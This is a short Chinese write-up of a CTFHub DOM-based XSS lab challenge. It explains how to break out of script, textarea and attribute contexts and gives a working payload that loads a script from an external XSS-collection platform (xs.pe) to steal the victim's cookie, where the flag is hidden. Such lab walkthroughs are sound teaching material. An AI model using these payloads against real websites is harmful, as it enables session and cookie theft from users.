XSS2-DOM反射(ctfhub)
一.题目链接:
https://www.ctfhub.com/#/skilltree
二.基础知识
.1 DOM反射
- 是什么?:DOM型和别的xss最大的区别就是他不经过服务器,仅仅是通过网页本身的javascript进行渲染触发的,我们可以观察,输入框的内容被发送到了哪?那个地方是不是可以被修改?从而插入自己的代码?
- 如何利用:通过闭合源代码本身的script语句,插入新建的恶意代码语句,就可实现攻击
- 举例:
';</script></textarea>'"<script src=这里换成自己熟练的xss平台上的恶意代码></script>
1.';--> 闭合js字符串
2.</script>--> 闭合script标签
3.</textarea>--> 闭合textarea标签
4.'">--> 闭合HTML属性
这里使用这么多闭合标签是为了把所有的情况都考虑在内
三.开始解题
1.阅读源代码,我们发现关键位置,其中'CTFhub is very niubility' 是我们可控的范围,于是构造闭合标签
';</script></textarea>'"<script src=这里换成自己熟练的xss平台上的恶意代码></script>
#主波这里的playload如下,用的是https://d00.cc/这个xss平台
';</script></textarea>'"><script src=//xs.pe/QK7></script>
//如果有伙伴不懂xss平台使用教程,移步这篇文章
https://www.cnblogs.com/sun010/articles/18822541
2.接下来我们把恶意代码输入框中,点击提交,再把上面的url复制到第二个框内,点击提交,回到自己的XSS页面刷新等待答案就好啦,flag藏在cookie那一行


五.思路总结
了解DOM反射型的漏洞特点 -->
查看源码,是否有被控制的地方,闭合原来的代码,script自己的恶意代码 -->
回到xss平台查看cookie

浙公网安备 33010602011771号